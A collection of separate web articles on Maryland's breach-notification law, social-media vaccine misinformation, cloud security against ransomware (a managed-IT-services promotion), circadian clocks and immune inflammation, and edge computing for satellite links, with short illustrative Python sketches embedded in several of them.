The laws now apply not only to businesses that own or license personal information but to businesses that maintain it. The 2019 amendments require organizations to conduct an investigation in the event of a breach and restricts how businesses can use breach related information. Under the new rules, businesses may only use breach-related data to notify affected consumers, protect personal information, and to inform national information security bodies about the breach. Does Maryland’s PIPA Apply to My Business? The provisions of the Maryland Personal Information Protection Act previously only applied to businesses that owned or licensed the personal information of the state’s residents. The 2019 amendments to the Maryland breach notification law required all businesses that maintain personal information to comply with PIPA. In other words, if your organization does business within Maryland and it licenses, maintains, or owns the personal information of Maryland residents, PIPA now applies to your business. The laws apply regardless of the size of your business and whether or not you’re physically located within the state. Penalties for Non-Compliance A violation of Maryland privacy laws is classified as a deceptive or unfair trade practice, according to the Consumer Protection Act of Maryland. In other words, violations can be classified as a criminal offense. Civil penalties start at $1,000 for a first violation and $5,000 for subsequent violations. The law also allows for private consumers to not only sue for damages, but they may also sue to recover attorney fees. The threat of private legal action means that organizations that fail to secure consumers’ personal information properly could find themselves facing expensive legal battles, with potentially unlimited financial penalties. If you want to learn more about compliance best practices, learn how Delphix provides an API-first data platform enabling teams to find and mask sensitive data for compliance with privacy regulations.
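To make the notification mechanics described above concrete, here is a small illustrative Python sketch. It encodes only the figures quoted in this article, the 45-day deadline and the 175,000-person threshold for substitute website/email notice, plus the required notice contents; the function name and the checklist structure are invented for the example, and none of this is legal advice.

from datetime import date, timedelta

NOTIFICATION_DEADLINE_DAYS = 45        # notify affected consumers within 45 days
SUBSTITUTE_NOTICE_THRESHOLD = 175_000  # above this, website or email notice is acceptable

def breach_notification_plan(discovered_on: date, affected_count: int) -> dict:
    """Sketch a notification checklist for a hypothetical breach."""
    return {
        "notify_by": discovered_on + timedelta(days=NOTIFICATION_DEADLINE_DAYS),
        "method": ("website_or_email"
                   if affected_count > SUBSTITUTE_NOTICE_THRESHOLD
                   else "written_notice"),
        "must_include": [
            "description of the compromised information",
            "the business's contact information",
            "FTC and Maryland OAG identity-theft guidance",
            "credit bureau contacts (TransUnion, Experian, Equifax)",
        ],
    }

print(breach_notification_plan(date(2019, 6, 1), affected_count=200_000))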
<urn:uuid:7537864e-1106-4bb1-95fa-a669a0966bb5>
CC-MAIN-2022-40
https://www.delphix.com/glossary/maryland-personal-information-protection-act
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00421.warc.gz
en
0.926283
1,057
2.578125
3
Individuals and groups that spread medical misinformation are well organized to exploit the weaknesses of the engagement-driven ecosystems on social media platforms. With less than half the United States population fully vaccinated for COVID-19 and as the delta variant sweeps the nation, the U.S. surgeon general issued an advisory that called misinformation an urgent threat to public health. The advisory said efforts by social media companies to combat misinformation are “too little, too late and still don’t go far enough.” The advisory came more than a year after the World Health Organization warned of a COVID-related “infodemic.” There’s good reason to be concerned. A study in the U.K. and the U.S. found that exposure to online misinformation about COVID-19 vaccines reduced the number of people who said they would get vaccinated and increased the number of people who said they would not. As a researcher who studies social media, I can recommend ways social media companies, in collaboration with researchers, can develop effective interventions against misinformation and help build trust and acceptance of vaccines. The government could intervene, but a bill to curb medical misinformation on social media filed in July is revealing some of the challenges – it’s drawing scorn for leaving to a political appointee decisions about what constitutes misinformation. A serious threat in online settings is that fake news spreads faster than verified and validated news from credible sources. Articles connecting vaccines and death have been among the content people engage with most. Algorithms on social media platforms are primed for engagement. Recommendation engines in these platforms create a rabbit-hole effect by pushing users who click on anti-vaccine messages toward more anti-vaccine content. Individuals and groups that spread medical misinformation are well organized to exploit the weaknesses of the engagement-driven ecosystems on social media platforms. Social media is being manipulated on an industrial scale, including a Russian campaign pushing disinformation about COVID-19 vaccines. Researchers have found that people who rely on Facebook as their primary source of news about the coronavirus are less likely to be vaccinated than people who get their coronavirus news from any other source. While social media companies have actively tagged and removed misinformation about COVID-19 generally, stories about vaccine side effects are more insidious because conspiracy theorists may not be trafficking in false information as much as engaging in selectively distorting risks from vaccination. These efforts are part of a well-developed disinformation ecosystem on social media platforms that extends to offline anti-vaccine activism. Misinformation on social media may also fuel vaccine inequities. There are significant racial disparities among COVID-19 vaccine recipients so far. For example, though vaccine-related misinformation is not the only source of these differences, health-related misinformation is rife on Spanish-language Facebook. Here are two key steps social media companies can take to reduce vaccine-related misinformation. Block known sources of vaccine misinformation There have been popular anti-vaccine hashtags such as #vaccineskill. Though it was blocked on Instagram two years ago, it was allowed on Facebook until July 2021. 
Aside from vaccines, misinformation on multiple aspects of COVID-19 prevention and treatment abounds, including misinformation about the health benefits of wearing a mask. Twitter recently suspended U.S. Rep. Marjorie Taylor Greene for a couple of days, citing a post of COVID misinformation. But social media companies could do a lot more to block disinformation spreaders. Reports suggest that most of the vaccine disinformation on Facebook and Twitter comes from a dozen users who are still active on social media referred to as the disinformation dozen. The list is topped by businessman and physician Joseph Mercola and prominent anti-vaccine activist Robert F. Kennedy Jr. Evidence suggests that infodemic superspreaders engage in coordinated sharing of content, which increases their effectiveness in spreading disinformation and, correspondingly, makes it all the more important to block them. Social media platforms need to more aggressively flag harmful content and remove people known to traffic in vaccine-related disinformation. Disclose more about medical misinformation Facebook claims that it has taken down 18 million pieces of coronavirus misinformation. However, the company doesn’t share data about misinformation on its platforms. Researchers and policymakers don’t know how much vaccine-related misinformation is on the platforms and how many people are seeing and sharing misinformation. Another challenge is distinguishing between different types of engagement. My own research studying medical information on YouTube found different levels of engagement, people simply viewing information that’s relevant to their interests and people commenting on and providing feedback about the information. The issue is how vaccine-related misinformation fits into people’s preexisting beliefs and to what extent their skepticism of vaccines is accentuated by what they are exposed to online. Social media companies can also partner with health organizations, medical journals and researchers to more thoroughly and credibly identify medical misinformation. Researchers who are working to understand how misinformation spreads rely on social media companies to conduct research about users’ behavior on their platforms. For instance, what researchers do know about anti-vaccine disinformation on Facebook comes from Facebook’s CrowdTangle data analysis tool for public information on the platforms. Researchers need more information from the companies, including ways to spot bot activity. Facebook could follow its own example from when it provided data to researchers seeking to uncover Russian fake news campaigns targeted at African American voters. Data about about social media will help researchers answer key questions about medical misinformation, and the answers in turn could lead to better ways of countering the misinformation. Anjana Susarla is an Omura-Saxena Professor of Responsible AI at Michigan State University.
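One way researchers operationalize the "coordinated sharing" mentioned above is to look for distinct accounts posting the same link within a very short window of one another. The sketch below, with fabricated posts and an arbitrary 60-second window, is a minimal illustration of that idea rather than a description of any platform's actual detection system.

from collections import defaultdict
from itertools import combinations

# (account, url, unix_timestamp) - fabricated sample posts
posts = [
    ("acct_a", "http://example.com/misinfo", 1000),
    ("acct_b", "http://example.com/misinfo", 1020),
    ("acct_c", "http://example.com/misinfo", 1045),
    ("acct_d", "http://example.com/other",   5000),
]

def coordinated_pairs(posts, window_seconds=60):
    """Yield pairs of accounts that shared the same URL within the time window."""
    by_url = defaultdict(list)
    for account, url, ts in posts:
        by_url[url].append((account, ts))
    for url, shares in by_url.items():
        for (a1, t1), (a2, t2) in combinations(shares, 2):
            if a1 != a2 and abs(t1 - t2) <= window_seconds:
                yield (a1, a2, url)

print(list(coordinated_pairs(posts)))   # flags the three accounts pushing the same link

Real studies layer on network analysis and far larger datasets, but the core signal, many accounts pushing the same content nearly simultaneously, is this simple.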
<urn:uuid:4552e060-be32-4aac-a751-1fbfb30419ec>
CC-MAIN-2022-40
https://www.nextgov.com/ideas/2021/07/big-tech-has-vaccine-misinformation-problem-heres-what-social-media-expert-recommends/184182/?oref=ng-next-story
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00421.warc.gz
en
0.943982
1,161
2.671875
3
Many organizations wonder why ransomware attacks tend to avoid the cloud, even as they see constant news of organizations being hit by cyber criminals and hackers. Ransomware threatens all industries, and SonicWall's annual threat report for 2021 reveals a 231.7 percent increase in ransomware attacks since 2019. In addition, CISA, the NSA, and the FBI have released an advisory stating that experienced hackers are franchising their ransomware tools to less experienced ones. Organizations must protect against ransomware attacks as part of their overall cybersecurity strategy, and proactively protecting endpoints from ransomware is mandatory. Ransomware is less of a threat if your organization is in the cloud.
What Is Ransomware?
Data breaches involve stolen data; ransomware is different. Ransomware is software that takes control of a system and encrypts data so that it cannot be accessed until you pay a ransom. Organizations can be crippled by this, effectively shut down until they regain access to their data. Yet cloud environments are not seeing ransomware attacks, despite ransomware being a major cyber threat.
A New Cyber Security Threat Landscape
Cloud control functions include building virtual servers, changing network routes, and gaining access to databases, and cloud management is controlled through the API control plane. A cloud platform provider like Amazon, Google, or Microsoft matters most to your data's security and resilience. The cloud makes replicating data cheap and easy, and a well-architected cloud environment ensures your data is backed up multiple times. The key to blocking ransomware is keeping multiple copies of your data to reduce an attacker's ability to lock you out: if an attacker encrypts your data and demands a ransom, you can revert to the latest version of the data from before the encryption. Good design and architecture, rather than intrusion detection and security analysis alone, are critical for cloud security. Attackers in the cloud are generally not trying to compromise your network to lock you out; they are trying to exploit cloud misconfigurations and your cloud APIs to steal data right from under your nose.
What Is Cloud Misconfiguration?
A cloud misconfiguration can range from a simple misconfiguration of a particular resource, such as leaving a port open, to an architectural weakness that attackers can exploit to turn a small misconfiguration into a giant cyber security hole. If your organization operates in the cloud, your environment has both kinds of vulnerabilities. Because cloud services are software, these types of cyberattacks can be prevented with a proactive approach, and a managed IT services Toronto provider can help plan this out.
Build Cloud Security on Policy
Cloud services infrastructure is designed and built so that you don't have to avoid the cloud. Managed IT services providers or developers own that process, which fundamentally changes the IT security team's role. With an organization-wide policy, an organization can state its security and compliance rules in clear, unambiguous language and eliminate configuration issues. You can use such a policy to detect undesired conditions in the running cloud environment (a minimal sketch of this kind of automated policy check appears at the end of this article). This makes it possible for all cloud services to operate securely, without ambiguity or disagreement about what the rules are and how they should be applied.
Harden Your Cloud Services Security Posture
Why do ransomware attacks avoid the cloud? Simple: there are guidelines that all organizations can follow to be effective with cloud security and to harden their cloud security posture:
- Take action. Hackers use automation to detect misconfigurations in cloud environments, so occasional cloud security audits are insufficient. Continuously assess your cloud environment with your managed IT services provider or IT department.
- Don't just react, be proactive. Do not turn away from intrusion detection, but the larger focus should be on preventing misconfiguration vulnerabilities. Cyberattacks on cloud services happen too fast for any technology or team to stop them in progress; a managed IT services Toronto provider will have tools in place to manage this proactively.
- Develop your team. Proactive cyber security training empowers staff to protect the company. This, combined with a proactive managed IT services provider, puts you in a better position to prevent misconfigurations.
- Identify and measure. Create an inventory of processes, services, and data. This lets you measure your cyber security controls and take a proactive approach with your managed IT services, preventing vulnerabilities and the security incidents that follow from them.
Proactive prevention is the best form of defense, because it lets you quickly identify and remedy cyber security misconfigurations. Why do ransomware attacks avoid the cloud? Simple: it is much easier to secure. Our complimentary data breach scan can check whether your credentials have been compromised by cyber criminals and hackers. We are the leading managed IT services provider in Toronto. Our boutique Toronto IT consulting firm specializes in award-winning Managed IT Services, Tech Support Services, Cloud Services, Cyber Security Training and Dark Web Monitoring, Business Continuity and Disaster Recovery (BCDR), IT Support Services, Managed Security Services, and IT Outsourcing Services. We Make IT Simple!
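Returning to the policy-as-code idea raised in the "Build Cloud Security on Policy" section above: the sketch below shows, in plain Python rather than any specific policy engine, how declared rules can be checked continuously against an inventory of running cloud resources. The resource records, rule names, and fields are all invented for illustration.

# Hypothetical inventory of cloud resources, e.g. pulled from a cloud provider API.
resources = [
    {"id": "sg-web",  "type": "security_group", "open_ports": [80, 443]},
    {"id": "sg-db",   "type": "security_group", "open_ports": [5432, 22]},
    {"id": "bkt-ehr", "type": "storage_bucket", "public": True, "versioning": False},
]

# Each policy is a rule name plus a predicate that returns True on a violation.
policies = {
    "no-ssh-open-to-world": lambda r: r["type"] == "security_group" and 22 in r["open_ports"],
    "no-public-buckets":    lambda r: r["type"] == "storage_bucket" and r.get("public", False),
    "versioning-required":  lambda r: r["type"] == "storage_bucket" and not r.get("versioning", False),
}

def evaluate(resources, policies):
    """Return every (resource id, violated rule) pair found in the inventory."""
    return [(r["id"], name)
            for r in resources
            for name, violated in policies.items()
            if violated(r)]

for resource_id, rule in evaluate(resources, policies):
    print(f"violation: {resource_id} breaks {rule}")

Run on a schedule or on every configuration change, a check like this is what turns a written policy into the continuous assessment recommended in the list above.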
<urn:uuid:56f5a77b-b3ef-4118-b862-12054b48ee10>
CC-MAIN-2022-40
https://365itsolutions.com/tag/why-ransomware-attacks-avoid-the-cloud/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00421.warc.gz
en
0.924561
997
2.765625
3
New research from RCSI has demonstrated the significant role that an irregular body clock plays in driving inflammation in the body’s immune cells, with implications for the most serious and prevalent diseases in humans. Published in Frontiers in Immunology, the research was led by the School of Pharmacy and Biomolecular Sciences at RCSI University of Medicine and Health Sciences. The circadian body clock generates 24-hour rhythms that keep humans healthy and in time with the day/night cycle. This includes regulating the rhythm of the body’s own (innate) immune cells called macrophages. When these cell rhythms are disrupted (due to things like erratic eating/sleeping patterns or shift work), the cells produce molecules which drive inflammation. This can lead to chronic inflammatory diseases such as heart disease, obesity, arthritis, diabetes and cancer, and also impact our ability to fight infection. In this study, the researchers looked at these key immune cells called macrophages with and without a body clock under laboratory conditions. They were interested to understand if macrophages without a body clock might use or ‘metabolise’ fuel differently, and if that might be the reason these cells produce more inflammatory products. The researchers found that macrophages without a body clock took up far more glucose and broke it down more quickly than normal cells. They also found that, in the mitochondria (the cells energy powerhouse), the pathways by which glucose was further broken down to produce energy were very different in macrophages without a clock. This led to the production of reactive oxygen species (ROS) which further fuelled inflammation. Dr. George Timmons, lead author on the study, said: “Our results add to the growing body of work showing why disruption of our body clock leads to inflammatory and infectious disease, and one of the aspects is fuel usage at the level of key immune cells such as macrophages.” Dr. Annie Curtis, senior lecturer at RCSI School of Pharmacy and Biomolecular Sciences and senior author on the paper, added: “This study also shows that anything which negatively impacts on our body clocks, such as insufficient sleep and not enough daylight, can impact on the ability of our immune system to work effectively.” The 2017 Nobel Prize for Physiology or Medicine has been awarded to three of the principal scientists who contributed to the discovery of the network of genes and proteins regulating the circadian rhythms based on the light/dark 24 h cycle (“The 2017 Nobel Prize in Physiology or Medicine—Press Release”) [1–3]. Circadian clocks are present in unicellular organisms, in plants, insects and vertebrates . The first gene encoding a critical component of a circadian clock (Period) was discovered in Drosophila by Konopka and Benzer in 1971 , showing that circadian clocks are genetically encoded. In mammals, circadian clocks are found in nearly all cells and tissues. They regulate and control physiological processes at the cellular, organ and organismal level, integrating signals received from outside and generated by the normal metabolism. The purpose of different levels of control is to adjust for possible local perturbations, while maintaining a circadian rhythm able to optimize energy allocation for the most likely scenario (which differs during activity and rest periods). For example, the liver clock should be synchronized to rhythms in food intake, but it should also respond to changes in energy demands or variations in oxygen supply. 
The organization of the mammalian multi-clock system allows for better adaptation to changing environments. This may represent a compromise between flexible adaptation to extremely unpredictable events and circadian stability, which can distinguish also the changes of light–dark hours (and temperature, humidity etc.) with the different seasons [4, 6]. Time keeping signals (“zeitgeber”) in natural conditions are tied to the day-night cycle imposed by the 24 h rotation cycle of the Earth. Light, this very potent zeitgeber, regulates the 24 h sleep–wake rhythm. Sleep precludes both food intake and locomotor activity. Thus, the sleep–wake rhythm governed by sunlight indirectly drives food intake and body temperature cycles. However light and food can be uncoupled (e.g. in the case of jetlag or when food intake is restricted to the natural sleeping phase as in shift work), causing misalignment of these clocks with the daily light–dark cycle of our environment [7, 8]. The field was stimulated by the finding of an intrinsically photosensitive small subgroup of retinal ganglion cells which regulate the circadian rhythms on the light–dark cycle [9, 10] and project to the suprachiasmatic nuclei (SCN) , the non-visual brain centers where the mammalian master biological clock is located; this has prompted the search for the molecular clock(s) driving this essential component of all living organisms. A handful of genes and proteins accounting for this complex regulatory central network has been identified. The mammalian core molecular clock consists of two feedback loops connected by a central pair of transcription factors which regulate reciprocally to induce the rhythm of gene expression. The mammalian circadian clock fundamentally depends on two master genes (CLOCK and BMAL1) to drive gene expression and regulate biological functions . CLOCK:BMAL1 heterodimers promote rhythmic chromatin opening and this mediates the binding of other transcription factors adjacent to CLOCK:BMAL1 . Among their targets there is a group of regulatory proteins [PERIOD (PER1, 2 and 3), CRYPTOCHROME (CRY1 and 2), REV-ERB (REV-ERBa and b) and RAR-Related Orphan Receptor (RORa, b and c)]; REV-ERBs and RORs regulate BMAL1 transcription, whereas PER and CRY dimerize to inhibit the BMAL1–CLOCK dimer. PER, the protein encoded by period [14, 15] accumulates during the night and is degraded during the day, while other components allow nuclear translocation of PER [16, 17]. Both sleep–wake cycles and many 24-h rhythms persist in the absence of environmental cues and are controlled by internal molecular clocks . Several loops dictate the production of these proteins, including steps of acetylation and phosphorylation, as well as secondary clock-regulated genes which can also feed back on central clock genes [6, 19]. In fact many different organs and tissues express functional molecular clock circuits . None of the mammalian clock components is directly photoreceptive; instead, light signals from the retina are transmitted neuronally to transcription factors that regulate period expression. Transcriptional feedback loops are central to the generation and maintenance of circadian rhythms [21, 22]. Clocks in peripheral tissues use essentially the same molecular components as in the SCN; clocks have been detected in different hematopoietic cell lineages, including macrophages and lymphocytes [22, 23]. 
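The transcription-translation feedback loop just described, CLOCK:BMAL1 driving PER and CRY, whose protein products feed back to repress CLOCK:BMAL1 activity, is often summarized with a delayed negative-feedback model. The Python sketch below integrates a generic Goodwin-type version of that loop; the rate constants are arbitrary illustrative values, not measured biological parameters, chosen so that the steep repression term yields sustained oscillations, and the period they produce is a property of these made-up numbers rather than of any real clock gene.

# Minimal Goodwin-type oscillator: clock-gene mRNA (x) is translated into
# protein (y), which gives rise to a nuclear repressor (z) that shuts off
# transcription - a cartoon of PER/CRY feedback onto CLOCK:BMAL1.
a, b, n = 20.0, 0.2, 10            # illustrative constants only

def step(x, y, z, dt=0.01):
    dx = a / (1 + z**n) - b * x    # transcription repressed by z, plus mRNA decay
    dy = x - b * y                 # translation and protein decay
    dz = y - b * z                 # accumulation and decay of the nuclear repressor
    return x + dx * dt, y + dy * dt, z + dz * dt

x, y, z = 1.0, 1.0, 1.0
series = []
for _ in range(40_000):            # 400 simulated hours at dt = 0.01 h
    x, y, z = step(x, y, z)
    series.append(x)

# Crude peak detection: show that mRNA peaks recur at a roughly fixed interval.
peaks = [i * 0.01 for i in range(1, len(series) - 1)
         if series[i - 1] < series[i] > series[i + 1]]
print([round(t, 1) for t in peaks[-4:]])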
The origin of circadian rhythms In humans, circadian rhythms of 24 h must be synchronized to coincide with the daily rotational cycle of the earth. The alignment of this autonomous circadian rhythm to an external rhythm is defined as entrainment. The light patterns represent the principal environmental stimulus for the rest/activity and sleep/wake cycles . It is also indirectly responsible for timing of food intake, another powerful entrainer of rhythm [24, 25]. Circadian photoentrainment is the process by which the internal clock in the deep brain becomes synchronized with the daily external cycle of solar light and dark [4, 9, 26]. The clocks in most mammalian cells are not directly photoreceptive, unlike those of most other organisms, but instead are entrained indirectly to the environmental light–dark cycle via photoreception in the retina, the retino-hypothalamic tract, and a central pacemaker tissue in the suprachiasmatic nucleus (SCN) of the hypothalamus . This process is initiated by a type of retinal ganglion cells that send axonal projections to the SCN, the region of the circadian pacemaker (Fig. 1). In contrast to retinal cells mediating vision, these cells are intrinsically sensitive to light, independent of synaptic input from rod and cone photoreceptors . Photoentrainment of the master pacemaker needs signaling from retinal ganglion cells containing the photopigment melanopsin and intrinsically photosensitive . The cryptochrome/photolyase family of photoreceptors mediates adaptive responses to ultraviolet and blue light exposure in all life forms . The SCN subsequently synchronizes peripheral clocks via mediators including hormones and neuronal signals, primarily using the hypothalamic–pituitary–adrenal (HPA) axis and the autonomic nervous system . The principal hormones i.e. glucocorticoids and catecholamines (epinephrine and norepinephrine), are released by the adrenal gland via the HPA axis , but norepinephrine is also derived from sympathetic nerve endings. The HPA is controlled by the SCN which projects to the paraventricular nucleus of the hypothalamus, and this in turn induces the release of adrenocorticotropic hormone by the pituitary, thus regulating the adrenal gland [20, 30]. Catecholamines act via adrenergic receptors, which have many effects on immune cells, as well as increasing the humoral immune responses . The integrated circadian system The central biological CLOCK system, influenced by light/dark changes, ‘creates’ the internal circadian rhythms, and the organism ‘feels’ these changes to put in frame physical activities, including energy metabolism, sleep, and immune function. 
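Picking up the toy oscillator from the sketch above, the entrainment just described can be represented by letting an external light signal add to the transcription rate during the light phase of a 24 h cycle, which is roughly how zeitgeber input is handled in published clock models. Whether the internal rhythm actually locks onto the forcing depends on the forcing strength and the oscillator's free-running period; the constants here remain purely illustrative and only show where a zeitgeber enters such a model.

a, b, n = 20.0, 0.2, 10                      # same illustrative constants as before

def light(t_hours, amplitude=2.0):
    """Square-wave zeitgeber: extra transcriptional drive during the light phase."""
    return amplitude if (t_hours % 24) < 12 else 0.0

def forced_step(x, y, z, t, dt=0.01):
    dx = a / (1 + z**n) + light(t) - b * x   # light input adds to transcription
    dy = x - b * y
    dz = y - b * z
    return x + dx * dt, y + dy * dt, z + dz * dt

x, y, z, t = 1.0, 1.0, 1.0, 0.0
series = []
for _ in range(40_000):                      # 400 simulated hours
    x, y, z = forced_step(x, y, z, t)
    t += 0.01
    series.append(x)

# If the loop is entrained, successive mRNA peaks fall at a similar time of day.
peaks = [(i * 0.01) % 24 for i in range(1, len(series) - 1)
         if series[i - 1] < series[i] > series[i + 1]]
print([round(p, 1) for p in peaks[-4:]])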
A recent review listed the following pathological conditions showing diurnal or 24 h patterning, by the organ/tissue/system affected, skin: atopic dermatitis, urticaria, psoriasis, and palmar hyperhidrosis; gastrointestinal: esophageal reflux, peptic ulcer, biliary colic, hepatic variceal hemorrhage, and proctalgia; infection: susceptibility, fever, and mortality; neural: frontal, parietal, temporal, and occipital lobe seizures, Parkinson’s and Alzheimer’s disease, hereditary progressive dystonia, and pain (cancer, post-surgical, diabetic neuropathy, burning mouth and temporomandibular syndromes, fibromyalgia, sciatalgia, and migraine, headache); renal: colic and nocturnal enuresis and polyuria; ocular: conjunctival redness, keratoconjunctivitis sicca, intraocular pressure, anterior ischemic optic neuropathy, and recurrent corneal erosion syndrome; psychiatric/behavioral: major and seasonal affective depressive disorders, bipolar disorder, suicide, and addictive alcohol, tobacco, and heroin cravings and withdrawal phenomena; plus autoimmune and musculoskeletal: rheumatoid arthritis, osteoarthritis, axial spondylarthritides, gout, Sjogren’s syndrome, and systemic lupus erythematosus. Some are directly linked to disruption of circadian rhythms, others result in disturbed sleep with loss of rhythmicity; the peripheral clocks in different tissues become out of phase with the central regulator and other physiologic functions, and this in turn aggravates the symptoms and alters the clinical picture. Relevance to immunological functions A wide range of immune parameters, such as the number of peripheral blood mononuclear cells as well as the level of cytokines, undergo daily fluctuations . Total numbers of hematopoietic stem cells and most mature leukocytes peak in the circulation during the resting phase (during the night for humans) and decrease during the day . Most immune cells express circadian clock genes and present a wide array of genes expressed with a 24-h rhythm. In addition to their functions in the cellular clock, circadian oscillators also participate in the development and specification of immune cell lineages. This has profound impacts on cellular functions, including a daily rhythm in the synthesis and release of cytokines, chemokines and cytolytic factors, the daily gating of the response occurring through pattern recognition receptors, circadian rhythms of cellular functions such as phagocytosis, migration to inflamed or infected tissue, cytolytic activity, and proliferative response to antigens . A pioneering contribution to this area was made by Halberg who discovered a diurnal susceptibility pattern in mice challenged with bacterial endotoxin. The migration of hematopoietic cells to tissues preferentially occurs during the daytime, directed by the circadian expression of cell adhesion molecules and chemokines. During the active phase it is more likely to encounter and detect pathogens and leukocyte trafficking into tissues occurs at the beginning of this phase (early morning). The increased cytokine release at this time point therefore may exacerbate any ongoing local inflammation . One of the mechanisms through which the central clock entrains peripheral tissues is by the production of glucocorticoids in the adrenal gland. Many other circadian signal transduction mediators also regulate the immune response, as melatonin and the autonomic nervous system (Fig. 1). 
Perturbation of the redox rhythm (linked to the circadian clock) induced by pathogen challenge triggers immune defense genes without compromising the circadian clock. Activation of innate immunity via TLR4 induces systemic inflammation by eliciting neuroendocrine and leukocyte transcriptional responses, which are regulated by the circadian clock, imposing a diurnal rhythm on the inflammatory response. The central clock is sensitive to immune challenge, and the brain receives inflammatory signals from the periphery in response to injury/infection. This in turn is thought to exacerbate sickness, produce symptoms such as depression, and impair diurnal rhythms of temperature and melatonin secretion. Melatonin, secreted by the pineal gland under SCN control, plays an important role in immune regulation; pinealectomy causes extensive immunosuppression, likely mediated by the decrease in lymphocytes and cytokines such as IL-2, IL-12, and TNF-α. Sleep and light influences The time and duration of sleep is tightly controlled by central mechanisms. These may be disrupted by disease processes, but also by other external conditions, such as night shifts, long-range flight travel (jet-lag) and social nocturnal activity (social jet-lag). Pro-inflammatory cytokines are generally indicated as sleep-inducing, and basal plasma levels of these cytokines appear higher during the rest phase. Infection-associated sleepiness has been attributed to increased pro-inflammatory cytokine plasma levels. Long-term sleep restriction leads to a gradual increase of circulating leukocytes and subpopulations (neutrophils, monocytes and lymphocytes), with alterations in the number and rhythm of neutrophils persisting after 1 week of recovery sleep; absolute sleep deprivation also alters the rhythmicity of granulocytes. Sleep disorders are one of the most common symptoms in patients with HIV/AIDS, but, despite the circadian rhythm alteration induced by Tat, HIV-infected patients with higher HIV Tat protein concentrations had better sleep quality, probably because Tat increases melatonin production, thus counteracting the poor sleep quality induced by HIV. On the opposite end of the sleep disorder spectrum, narcolepsy, which is generally considered an immune-mediated neurological disease characterized by excessive daytime sleepiness, has recently been characterized by increased inflammatory cytokine production and B and T cell activation markers, at variance with other hypersomnia patients, who were immunologically distinct and did not present increased plasma cytokines. Many immunological functions depend on the influence of sleep on circadian rhythms, and loss of sleep, in turn, alters the production of glucocorticoids during the night. The neuroendocrine immune response of the HPA axis and sympathetic nervous system, which is activated in response to an antigenic challenge with transient inflammatory activity, can lead to metabolic diseases when chronically activated, since in all inflammatory conditions high amounts of energy have to be provided for the activated immune system. Experimental animal models and epidemiological data indicate that chronic circadian rhythm disruption increases the risk of metabolic diseases. In patients with rheumatoid arthritis (RA), inflammation is an important covariate for the crosstalk of sleep and the HPA axis. Moreover, sleep parameters are interrelated with inflammation (as objectified by C-reactive protein) and with serum cortisol and adrenocorticotropic hormone levels.
Knowledge of circadian rhythms and the influence of glucocorticoids in rheumatology is important: besides optimizing treatment for the core symptoms (e.g. morning stiffness in RA), chronotherapy might also relieve important comorbid conditions such as depression and sleep disturbances. Sleep and circadian disturbances are a frequent complaint of Alzheimer's disease patients, appearing early in the course of disease, and disruption of many circadian rhythms is also present in Parkinson's disease. Physiological studies show that aging affects both sleep quality and quantity in humans, and sleep complaints increase with age. Moreover, feeding/fasting rhythms are also compromised. Circadian expression of secreted signaling molecules transmits timing information between cells and tissues. Such daily rhythms optimize energy use and temporally segregate incompatible processes. Patients suffering from neuropsychiatric disorders often exhibit a loss of regulation of their biological rhythms, which leads to alterations of sleep/wake, feeding, body temperature and hormonal rhythms. Increasing evidence indicates that the circadian system may be directly involved in the etiology of these disorders. Light, especially short-wavelength blue light, is the most potent environmental cue in circadian photoentrainment, and lens aging is thought to influence this event by acting as a filter for shorter blue wavelengths; light conditions during indoor activities as well as sunlight exposure are of paramount importance to preserve circadian rhythmicity and avoid a risk factor for several chronic diseases. These considerations have an impact on the comorbidities of aged subjects and underline the importance of choosing intraocular lenses with appropriate light-filtering properties after cataract removal. Reference link: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5763605/ More information: George A. Timmons et al, The Circadian Clock Protein BMAL1 Acts as a Metabolic Sensor In Macrophages to Control the Production of Pro IL-1β, Frontiers in Immunology (2021). DOI: 10.3389/fimmu.2021.700431
<urn:uuid:436ab413-b022-4db0-bcd9-2971333a731f>
CC-MAIN-2022-40
https://debuglies.com/2021/11/24/the-significant-role-that-an-irregular-body-clock-plays-in-driving-inflammation-in-the-bodys-immune-cells/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335124.77/warc/CC-MAIN-20220928051515-20220928081515-00621.warc.gz
en
0.916245
3,917
3.703125
4
The Edge of Extraterrestrial Exploration October 4, 2018 How edge computing will enable more powerful satellite communications Strangely, satellite communications have always been extremely limited in potential. But that’s about to change – thanks to edge computing and the iot world. If you’re not exactly familiar with how satellite communications work, here’s a quick explanation: any entity that wants to leverage satellite networks will need to use a satellite modem to transmit data from a specific location or item to one of the hundreds of satellites orbiting the earth. That entity also has to pay a satellite communications company to use those satellite networks, in the same way consumers pay for cell phone service. From that perspective, it doesn’t sound that complex. However, there are a couple of complicating factors. First, it’s quite expensive to transmit data via satellites. Satellite operators take on enormous costs to install their communication protocols on each satellite, and the satellite modems themselves are not cheap either. When compared to cellular networks, which transmit signals from tower to tower, there’s a big difference in cost. Who would have thought operating gigantic space tech would be so expensive? Also, the devices used to communicate with satellites aren’t very smart. They are generally programmed with only a few low-bandwidth protocols and can collect and send very limited data inputs up to satellites for transmission. There’s no processing power to take in various inputs, decide which ones are really necessary, and then package them up for transmission. Advances in edge computing will enable cheaper, more actionable satellite communications, by giving new life to existing infrastructure. Here’s an example of how it will happen: Edge compute devices + satellite modems = better data insights via satellite. Consider how satellite communications work today to understand how they will improve in the future. Many of us who navigate road traffic each day use Google Maps or Waze to map driving routes, find out our estimated travel time, avoid wrecks and road closures, find the nearest Dairy Queen, etc. As we’re driving, there’s a constant signal on the screen of where we are located. This signal is sent from our devices to a satellite. Repeatedly it says, “here I am, here I am”. Until of course, you become fixated with texting George about lunch plans and “there your not”. It might seem like business communications through satellites would be more complex than our driving example, but they really aren’t. That same “here I am, here I am” signal is all they are getting as well, it’s just for a different entity. Maybe it’s a trucking company that has hundreds of trucks, or an airline tracking airplanes as they circle the globe. Today, the highest level of data complexity transmitted is still just location-based. Edge computing will enable more, higher-quality data inputs by supercharging the processing power of satellite modems in use today. Because of the way satellite modems are built, they simply can’t handle the level of bandwidth needed to provide more complex inputs. However, an edge computing device operating on an internet of things cloud platform paired with a satellite modem can provide much more sophisticated data insights. Let’s say a global shipping company wants to track what’s happening with their shipping containers at any point in time. 
